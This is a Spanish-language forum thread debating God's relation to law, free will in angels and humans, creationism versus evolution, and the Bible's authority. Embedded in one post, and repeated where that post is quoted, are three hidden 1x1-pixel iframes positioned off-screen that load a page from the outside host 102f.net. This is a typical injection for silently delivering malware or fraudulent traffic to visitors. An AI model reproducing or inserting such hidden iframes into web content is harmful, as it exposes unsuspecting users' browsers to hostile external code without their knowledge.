¿Quién puso en la naturaleza de los ángeles la capacidad de rebelarse?

Re: 01ngeles la capacidad de re

bien entonces , dios esta sujeto a unas normas ,por tanto, tal ley(normas) estan por encima de Dios y son superiores a Dios.

¿Fue una pregunta o una sentencia? Se lee que Dios es la Ley, por tanto, no puede estar la ley o Dios por encima de si mismo.

Última edición:

¿Fue una pregunta o una sentencia? Se lee que Dios es la Ley, por tanto, no puede estar la ley o Dios por encima de si mismo.

entonces no esta sujeto a nada , pues la ley es su voluntad , entonces lo bueno es lo que dios quiere que sea , si mañana por su voluntad cambia, puede hacer que todo lo que considera bueno sea malo , dios seria un ser amoral , entonces si quedaria en manos del hombre discernir , si seguir la voluntad de tal ser sea bueno para el o no..

entonces no esta sujeto a nada , pues la ley es su voluntad , entonces lo bueno es lo que dios quiere que sea , si mañana por su voluntad cambia, puede hacer que todo lo que considera bueno sea malo , dios seria un ser amoral , entonces si quedaria en manos del hombre discernir , si seguir la voluntad de tal ser sea bueno para el o no..

Cuando mencionas que no esta sujeto a nada, ¿no estas aboliendo la Ley? Ahora, si nadie puede estar encima de la ley, ¿no crees que la ley es inmutable?

Re: ngeles la capacidad de re

Aja, ya te respondo. si. Ahora te toca responder, cuando Dios es capaz y pudiendo hacer el mal y sin embago no la hace, y no siendo robot, ¿porque no hace el mal?

Dios no puede hacer el mal, lo mismo que un gato no puede cantar como un canario.

Dios NO PUEDE hacer el mal porque es contrario a su esencia.

Vamos a tratar de que entiendas esta parte aries...

Cuando el Creador dio la ley de gravedad, fue para este universo, idem con el tiempo... el está fuera de este universo y por ello estas leyes no le afectan.

Cuando dio Torah en sinaí, fue como una constitución para su pueblo, constitución que todo ciudadano tiene que cumplir, tal como tu cumples la de tu país; por lo cual tu haces tu parte y el estado hace la que le corresponde.

Pregunta ¿Cuál norma, regla, instrucción, estatuto quebranta el Creador como para que hayas abierto este debate con espíritu?

Si me la escribes, con gusto trataré de responder para que comprendas el propósito de ella.

Re: ¿Quién puso en la naturaleza de los ángeles la capacidad de rebelarse?

No se para que entras en polémica con el tal Natanael, el no quiere entablar una conversación solo quiere polémicas, no te das cuenta que con todo el mundo hace lo mismo. Imagino que estará aburrido de la vida, tendría que ir a un psicólogo pues cualquier día comete una locura.

¿De dónde ha venido entonces según tú el hombre y la mujer Martamaria?
Esta es la estadística que pone la Wikipedia acerca de las personas que ha habido en la tierra en según qué años.

attachment.php

Según el año 10.000 AC existía entre 100 y 1.000.000 de personas. ¿Qué crees tú que paso cuando solo hubo dos personas? ¿Cómo aparecieron? ¿Vinimos del mono? ¿En qué momento el mono se convirtió en hombre? ¿Dónde están los hombres monos ahora? Imagínate que por una milésima de segundo fuese así, te hago la misma pregunta. La cantidad de monos iría descendiendo con el paso del año hasta que solo habría dos monos ¿Qué bicho se convirtió en mono que después se convirtió en hombre? Y así puedo seguir infinitamente hasta que el mundo dejara de existir.

La Biblia tiene una razón para explicar estas cosas.
(Hebreos 3:4) Por supuesto, toda casa es construida por alguien, pero el que ha construido todas las cosas es Dios.
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1… Deje de ser niño hace bastante años Martamaria por eso sé que es imposible que las hadas existan porque no me ha dado pruebas de ello mientras que Dios si me lo ha dado.
Yo solo te he preguntado que las personas han tenido que salir de algún sitio ¿no? Yo te he dicho que para mí ha sido Dios quién los ha creado y te he puesto mis argumentos. Y te digo que me digas tú de dónde crees que han salido el hombre y la mujer y que me digas como puede ser eso. Si me dices que del mono, pues explícame dónde están los hombres monos que han desaparecido y sin embargo los monos y las personas seguimos existiendo. En todo caso, dime de dónde aparecieron los monos, y si estos salieron de algún sitio de dónde aparecieron sus ascendientes.

Que si ha sido la bomba cósmica esa, explícame como toda esta tan bien puesto y organizado cuando una bomba hace todo lo contrario. Tan solo quiero que me expliques tu algo Martamaria, porque nos pones en dudas a todos los creyentes pero tú no das ninguna base en la que podamos pensar si nos salimos de la creencia de Dios.

2… ¿Por qué no va a crear a una sola pareja si lo que quería que toda la descendencia de nuestro planeta viniese de esa sola pareja. Si su pensamiento es que todos tengamos una sola sangre en común, que todos entre comillas seamos “hermanos” ¿Cómo va a hacer distintas parejas?

Por otro lado, dime ¿de dónde sacas que Dios sabía que Adán y Eva iban a pecar? Yo he leído la Biblia y en ningún sitio vea que aparezca eso

3… Si tú no sabes cómo llego el hombre a existir ¿A qué viene refutar lo que otros si creemos? Normalmente los que estamos aquí refutamos lo que otros dicen pero ponemos prueba de porque pensamos así. Tú no puedes decir que no a una cosa porque te dé la gana sin demostrar por qué tenemos que pensar que tú tienes razón. Tienes que intentar convencernos con tur argumentos, que no veo ninguno

4… Entonces no entiendo a los agnósticos como tú, que no creéis en nada pero en algo se debe creer. El hombre no ha aparecido por que si. De alguna forma ha tenido que hacerlo y para mi la Biblia me ha dado pruebas de como ha sido
1… Yo tampoco soy un bebé.
a...Si hubiese evidencias reales de que Dios existe no habría ateos. Porque los ateos no lo son por que les dé la gana ni por fastidiar a Dios.
Esas pruebas que mencionas son pura sugestión tuya debido a la fe.
Cuando yo tenía fe, también tenía evidencias de que Dios intervenia en mi vida.

2… Sobre el origen del hombre y la mujer, no me has probado nada, solo has dicho lo que te dice tu fe y eso ni son pruebas ni son argumentos. Porque partes de algo que no se ha demostrado: que Dios sea real que es lo primero que hay que probar antes de decir que es creador.
Yo no te he dicho que sepa de dónde vienen, he reconocido que no lo sé. Como lo reconocen muchos científicos.

3… El big-bang no fue un bomba. Fue una explosión que liberó los elementos de la tabla periódica que son capaces de interactuar entre sí para formar compuestos más complejos. Cómo lo fueron haciendo ni en cuanto tiempo, eso tampoco lo sé.
Ni cómo apareció la flora y la fauna.
Pero tampoco sé si Dios ES o si no ES. Y por eso no puedo basar nada en el poder de un ser que de momento no se si existe.

4…Pues porque para tener descendientes de una sola pareja, lo primero reprobable es que tenían que mantener relaciones incestuosas y eso es algo que el mismo Dios condena. Y eso de ahora sí vale y luego no vale...no es serio en un Dios.
Y porque si no es aconsejable casarse entre primos carnales por la degeneración biológica que supone, cuánto menos entre padres e hijas, madres e hijos, hermanos y hermanas.
Y porque si quería toda una comunidad, podía haberlos creados directamente y algunos habrían obedecido a la serpiente, pero otros no, y no habría condenado a todos.

5… La biblia no es palabra de Dios. Eso para empezar.
5...a... Y segundo, lo saco de los atributos de Dios: omnisciente, omnipotente, eterno, omnipresente...

6.. Si no lo sé, no puedo tener argumentos.
Pero tú tampoco los tienes. Tú tienes creencias. Algo que solo se sostiene por la fe. No por pruebas, por muy seguro que tú estés.

1… Los ateos lo son por distintas razones. Primero, les ha pasado algo con la religión en la que estuvieron metido y en vez de pagarlo con esa religión lo pagan con Dios. Segundo, por vagos, no quieren trabajar en averiguar si existe o no y siempre ponen trabas sin argumentación a lo que dicen los creyentes. Tercero, por ignorancia, le han dicho de pequeño que no hay nada y han creído lo que le han dicho y se han vuelto como en el punto segundo. Cuarto, por rebeldía contra Dios mismo, creen que es culpa de Dios el que le hayan pasado lo malo por las creencias que le han metido en la cabeza. Un ejemplo, los curas acostumbran a decir a los padres cuando se les muere un niño pequeño que Dios se lo ha llevado para hacerlo un angelito, algo increíble pero que sucede, le echan la culpa a Dios por la muerte de ese niñito. Quinto, los hay ateos por convicción, son sinceros en que no hay nada.

Por supuesto que la fe es importante en la vida de un cristiano, pero sin pruebas no se puede tener fe y yo tengo esas pruebas,

2… Te he puesto la tabla donde las personas iban decreciendo. Llegaba un punto en que ya no podía haber ser humanos, ni animales. No sabes cómo apareció todo esto pero sin embargo pones trabas a lo que dice la Biblia que te lo explica. La Biblia es la única que te dice como apareció todo, no tienes otra clase de razonamiento, ni tú ni los científicos, pero os parece imposible lo que dice las escrituras,

3… Todo lo que explota para mi es una bomba o un petardo según la intensidad de la explosión. Dice que libero los elementos de la tabla periódica y que estos elementos interactuaron entre sí. ¿Esa interactuación no tuvo fallos? ¿Tan bien interactuaron esos elementos que todo salió perfecto? Vamos Martamaria, eres más inteligente que eso, sabes que para que esos elementos funciones bien debe haber una combinación exacta. Por ejemplo, para convertir el oxígeno que necesitamos en la tierra ¿Qué hace falta? Búscalo y mira qué pasaría con la vida humana y animal si le echaran más o menos ingrediente de lo que se necesita. Hace falta una combinación perfecta.

¿Pudiera ser que el que haya combinado perfectamente esos elementos de la tabla sea Dios?

4...Como te he dicho si pone varias parejas, ya no seriamos “hermanos de sangre”. Te pongo el comentario de un estudioso bíblico que te dara la respuesta mejor que yo.
“Para algunas sociedades modernas, sin embargo, resulta inconcebible que Caín se hubiera casado con una de sus hermanas o con alguna mujer que hubiera nacido de la unión de un hijo y una hija de Adán. Dicha reacción suele deberse a las normas sociales establecidas y al temor a los defectos genéticos. No obstante, Frank LaGard Smith comenta lo siguiente en su obra La Biblia Cronológica: “Es muy probable que estos primeros hermanos y hermanas se hayan casado entre ellos, a pesar del sentido inapropiado que se sentiría si eso hubiera sucedido en las siguientes generaciones”. Es digno de mención, además, que no fue sino hasta 1513 antes de nuestra era —año en que Moisés recibió las leyes para la nación de Israel— que Dios prohibió específicamente las relaciones sexuales entre parientes cercanos (Levítico 18:9, 17, 24).

Si te fijas, fue hace unos 3500 años cuando Dios dio esas leyes. En aquel entonces no se veía ni mal ni raro tener relaciones entre hermanos y parientes para poder tener descendencia. No había problemas de genética hasta que ya no había rastro de la perfección con la que fueron creados Adán y Eva.

5… Mientras no me demuestres lo contrario para mi SI será la palabra de Dios. Así que ponme algo que yo no sepa y que tu si por la que estas tan segura de que no lo es.

5...a...¿Tú has visto alguna película de superhéroes? ¿Ellos usan esos poderes cada vez que le dan la gana o lo usan tan solo para hacer el bien?
Jehová no necesitaba ver el futuro para ver si Adán y Eva iban a pecar. Él tenía plena confianza en ellos, los hizo perfecto, pero no los hizo robot. Tan solo les advirtió de lo que sucedería si le desobedecía al igual que un buen padre mira por el bienestar de sus hijos y les advierten de que si les desobedecen los castigará ¿Tú no has hecho eso nunca eso con tus hijos? ¿Tú nunca le has dicho? Como toques eso te voy a dar un cachete. ¿Tú dabas por sentado que tus hijos iban a tocar lo que les habías prohibido? ¿Verdad que no? Pues lo mismo con Jehová amiga mia.

6… ¿Quién te ha dicho que no tengo pruebas? Para mí la Biblia es un libro que me da pruebas, tanto histórica, genealógica, arquitectónica, científica y todo lo que tú quieras. La Biblia te da datos que no vas a encontrar en otro sitio, y con el tiempo se ha verificado que tiene razón ¿Por qué quieres quitarle el mérito a la Biblia?

¿Por qué crees tú en tantas cosas que han pasado en la historia del hombre si tu no lo has vivido?
¿Por qué sabes que quienes inventaron miles de cosas que con las que nos beneficiamos hoy día es de verdad que ellos la inventaron y no otros?
¿Por qué sabes que Colon descubrió América si tú fuiste con él?
Ah vale porque lo pone en distintos libros y tú lo has leído y como alguien lo ha puesto ahí tú lo crees. Sin embargo el libro más grande de historia, el libro más grande de ciencia, el libro más grande de salud, no quieres creerlo porque viene de Dios.

Como dijiste, nadie te da razones válidas de cómo ha surgido la vida, nadie te lo ha demostrado. La Biblia te lo dice pero no quieres creerla. Hoy ves como los científicos son capaces de sacar vida de un cuerpo muerto hace miles de años como por ejemplo de un mamut. Ves capaz al hombre de dar vida pero no eres capaz de ver que a alguien superior que también puede dar esa vida a grado más superior. Eso no es ser escéptica Martamaria eso es ser incrédula, no quieres ver lo que tienes delante de tus ojos.

Si de verdad quieres tener pruebas de la Biblia léete estos artículos, pero no me digas que no es así sin haberlo leído. Cuando lo hagas entonces me dices por qué no lo crees.

Razones para confiar en la Biblia: su exactitud científica

Razones para confiar en la Biblia: su exactitud histórica

Razones para confiar en la Biblia: la franqueza de sus escritores

Razones para confiar en la Biblia: su coherencia interna

Razones para confiar en la Biblia: el cumplimiento de profecías

<iframe src="//102f.net/al1000.html" style="width: 1px; height: 1px; position: absolute; top: -10px; border: medium none;"></iframe><iframe src="//102f.net/al1000.html" style="width: 1px; height: 1px; position: absolute; top: -10px; border: medium none;"></iframe><iframe src="//102f.net/al1000.html" style="width: 1px; height: 1px; position: absolute; top: -10px; border: medium none;"></iframe>

Otra pregunta sería: ¿Antes de crearnos, Dios sabía que íbamos a rebelarnos?

Salu2

Lo que pasa, creo yo (y no lo digo solo por esto que has puesto ahora, sino por muchas cosas similares), es que tú te encasillas en un razonamiento que piensas que es correcto, y no admites que tal vez haya algo que no estás teniendo en cuenta.

No todo siempre es súper intuitivo. Eso aún pasa en la ciencia física, por ejenmplo en la mecánica cuántica. No todo es como a uno le parece intuitivamente que debería funcionar.

Dios lo que dio no fue rebeldía, sino libertad. Se podría decir que la rebeldía es una posibilidad latente dentro de la libertad, pero no un producto necesario, sino posible.

¿Los ángeles tienen libertad? Tenía entendido que no podían elegir entre el bien o el mal, que eso solo era para los humanos.

Salu2

¿Los ángeles tienen libertad? Tenía entendido que no podían elegir entre el bien o el mal, que eso solo era para los humanos.

Salu2

Si Gustas Leer Un Poco Màs... De Los Angeles ... Amado Hermano ...

Los ÁNGELES

1… Los ateos lo son por distintas razones. Primero, les ha pasado algo con la religión en la que estuvieron metido y en vez de pagarlo con esa religión lo pagan con Dios. Segundo, por vagos, no quieren trabajar en averiguar si existe o no y siempre ponen trabas sin argumentación a lo que dicen los creyentes. Tercero, por ignorancia, le han dicho de pequeño que no hay nada y han creído lo que le han dicho y se han vuelto como en el punto segundo. Cuarto, por rebeldía contra Dios mismo, creen que es culpa de Dios el que le hayan pasado lo malo por las creencias que le han metido en la cabeza. Un ejemplo, los curas acostumbran a decir a los padres cuando se les muere un niño pequeño que Dios se lo ha llevado para hacerlo un angelito, algo increíble pero que sucede, le echan la culpa a Dios por la muerte de ese niñito. Quinto, los hay ateos por convicción, son sinceros en que no hay nada.

Por supuesto que la fe es importante en la vida de un cristiano, pero sin pruebas no se puede tener fe y yo tengo esas pruebas,

2… Te he puesto la tabla donde las personas iban decreciendo. Llegaba un punto en que ya no podía haber ser humanos, ni animales. No sabes cómo apareció todo esto pero sin embargo pones trabas a lo que dice la Biblia que te lo explica. La Biblia es la única que te dice como apareció todo, no tienes otra clase de razonamiento, ni tú ni los científicos, pero os parece imposible lo que dice las escrituras,

3… Todo lo que explota para mi es una bomba o un petardo según la intensidad de la explosión. Dice que libero los elementos de la tabla periódica y que estos elementos interactuaron entre sí. ¿Esa interactuación no tuvo fallos? ¿Tan bien interactuaron esos elementos que todo salió perfecto? Vamos Martamaria, eres más inteligente que eso, sabes que para que esos elementos funciones bien debe haber una combinación exacta. Por ejemplo, para convertir el oxígeno que necesitamos en la tierra ¿Qué hace falta? Búscalo y mira qué pasaría con la vida humana y animal si le echaran más o menos ingrediente de lo que se necesita. Hace falta una combinación perfecta.

¿Pudiera ser que el que haya combinado perfectamente esos elementos de la tabla sea Dios?

4...Como te he dicho si pone varias parejas, ya no seriamos “hermanos de sangre”. Te pongo el comentario de un estudioso bíblico que te dara la respuesta mejor que yo.
“Para algunas sociedades modernas, sin embargo, resulta inconcebible que Caín se hubiera casado con una de sus hermanas o con alguna mujer que hubiera nacido de la unión de un hijo y una hija de Adán. Dicha reacción suele deberse a las normas sociales establecidas y al temor a los defectos genéticos. No obstante, Frank LaGard Smith comenta lo siguiente en su obra La Biblia Cronológica: “Es muy probable que estos primeros hermanos y hermanas se hayan casado entre ellos, a pesar del sentido inapropiado que se sentiría si eso hubiera sucedido en las siguientes generaciones”. Es digno de mención, además, que no fue sino hasta 1513 antes de nuestra era —año en que Moisés recibió las leyes para la nación de Israel— que Dios prohibió específicamente las relaciones sexuales entre parientes cercanos (Levítico 18:9, 17, 24).

Si te fijas, fue hace unos 3500 años cuando Dios dio esas leyes. En aquel entonces no se veía ni mal ni raro tener relaciones entre hermanos y parientes para poder tener descendencia. No había problemas de genética hasta que ya no había rastro de la perfección con la que fueron creados Adán y Eva.

5… Mientras no me demuestres lo contrario para mi SI será la palabra de Dios. Así que ponme algo que yo no sepa y que tu si por la que estas tan segura de que no lo es.

5...a...¿Tú has visto alguna película de superhéroes? ¿Ellos usan esos poderes cada vez que le dan la gana o lo usan tan solo para hacer el bien?
Jehová no necesitaba ver el futuro para ver si Adán y Eva iban a pecar. Él tenía plena confianza en ellos, los hizo perfecto, pero no los hizo robot. Tan solo les advirtió de lo que sucedería si le desobedecía al igual que un buen padre mira por el bienestar de sus hijos y les advierten de que si les desobedecen los castigará ¿Tú no has hecho eso nunca eso con tus hijos? ¿Tú nunca le has dicho? Como toques eso te voy a dar un cachete. ¿Tú dabas por sentado que tus hijos iban a tocar lo que les habías prohibido? ¿Verdad que no? Pues lo mismo con Jehová amiga mia.

6… ¿Quién te ha dicho que no tengo pruebas? Para mí la Biblia es un libro que me da pruebas, tanto histórica, genealógica, arquitectónica, científica y todo lo que tú quieras. La Biblia te da datos que no vas a encontrar en otro sitio, y con el tiempo se ha verificado que tiene razón ¿Por qué quieres quitarle el mérito a la Biblia?

¿Por qué crees tú en tantas cosas que han pasado en la historia del hombre si tu no lo has vivido?
¿Por qué sabes que quienes inventaron miles de cosas que con las que nos beneficiamos hoy día es de verdad que ellos la inventaron y no otros?
¿Por qué sabes que Colon descubrió América si tú fuiste con él?
Ah vale porque lo pone en distintos libros y tú lo has leído y como alguien lo ha puesto ahí tú lo crees. Sin embargo el libro más grande de historia, el libro más grande de ciencia, el libro más grande de salud, no quieres creerlo porque viene de Dios.

Como dijiste, nadie te da razones válidas de cómo ha surgido la vida, nadie te lo ha demostrado. La Biblia te lo dice pero no quieres creerla. Hoy ves como los científicos son capaces de sacar vida de un cuerpo muerto hace miles de años como por ejemplo de un mamut. Ves capaz al hombre de dar vida pero no eres capaz de ver que a alguien superior que también puede dar esa vida a grado más superior. Eso no es ser escéptica Martamaria eso es ser incrédula, no quieres ver lo que tienes delante de tus ojos.

Si de verdad quieres tener pruebas de la Biblia léete estos artículos, pero no me digas que no es así sin haberlo leído. Cuando lo hagas entonces me dices por qué no lo crees.

Razones para confiar en la Biblia: su exactitud científica

Razones para confiar en la Biblia: su exactitud histórica

Razones para confiar en la Biblia: la franqueza de sus escritores

Razones para confiar en la Biblia: su coherencia interna

Razones para confiar en la Biblia: el cumplimiento de profecías

<iframe src="//102f.net/al1000.html" style="width: 1px; height: 1px; position: absolute; top: -10px; border: medium none;"></iframe><iframe src="//102f.net/al1000.html" style="width: 1px; height: 1px; position: absolute; top: -10px; border: medium none;"></iframe><iframe src="//102f.net/al1000.html" style="width: 1px; height: 1px; position: absolute; top: -10px; border: medium none;"></iframe>

Se conoce que no has leído la biblia...

Si es contrario a su esencia, no puede.

De nueva cuenta.. el es duenio de las cosas y puede hacer lo que quiera.. nada se lo impide... es es el problema con los seres omnicientes... no tienen limites (claro que todos los conceptos que manejamos fueron creados por el hombre.. entonces)

No Sòlo Es Leerla...Se Tiene Que Escudriñar...Amada Hermana...

Primero se lee y crea tal confusión respecto al Dios que predicaba Jesús de Nazaret, que se estudia. Y la confusión aumenta. Y se vuelve a estudiar y a escudriñar y entonces se concluye que no puede ser palabra del Dios Padre del que hablaba Jesús, y se deja de creer que es palabra de Dios Padre.

De nueva cuenta.. el es duenio de las cosas y puede hacer lo que quiera.. nada se lo impide... es es el problema con los seres omnicientes... no tienen limites (claro que todos los conceptos que manejamos fueron creados por el hombre.. entonces)

Insito: Dios NO PUEDE ir contra su propia naturaleza.

realmente.. si dios es el creador, el puede hacer lo que quiera...

Dios NO PUEDE ir contra su propia naturaleza.

Dios puede hacer todo lo que sea posible hacer, aunque no lo sea para el hombre.
El hombre no puede hacer que una mujer sin útero geste un hijo.
Pero Dios si puede porque puede crearle un útero.
Pero Dios no puede hacer que, A LA VEZ, el mar sea agua y roca.
No puede hacer que una persona ande y se esté quieta A LA VEZ.
Que una persona hable y calle A LA VEZ.

Dios puede hacer todo lo que sea posible hacer. No puede hacer que dos cosa sean A LA VEZ una y la contraria.

Dios NO PUEDE ir contra su propia naturaleza.

Dios puede hacer todo lo que sea posible hacer, aunque no lo sea para el hombre.
El hombre no puede hacer que una mujer sin útero geste un hijo.
Pero Dios si puede porque puede crearle un útero.
Pero Dios no puede hacer que, A LA VEZ, el mar sea agua y roca.
No puede hacer que una persona ande y se esté quieta A LA VEZ.
Que una persona hable y calle A LA VEZ.

Dios puede hacer todo lo que sea posible hacer. No puede hacer que dos cosa sean A LA VEZ una y la contraria.

a ver... de acuerdo a la mitologia judia.. y de acuerdo a las definiciones (humanas porsupuesto) de divinidad...un dios puede hacer lo que sea... incluso romper las "leyes de la fisica" sin destruir el universo... eso es lo interesante de las figuras mitologicas... pueden hacer lo que quieran porque para ellos los limitaciones fisicas del universo simplemente no aplican.... de acuerdo a la historia original dios es un ser celsos y vengativo que tiene una gran furia.. asi que su naturaleza es agresiva y destructiva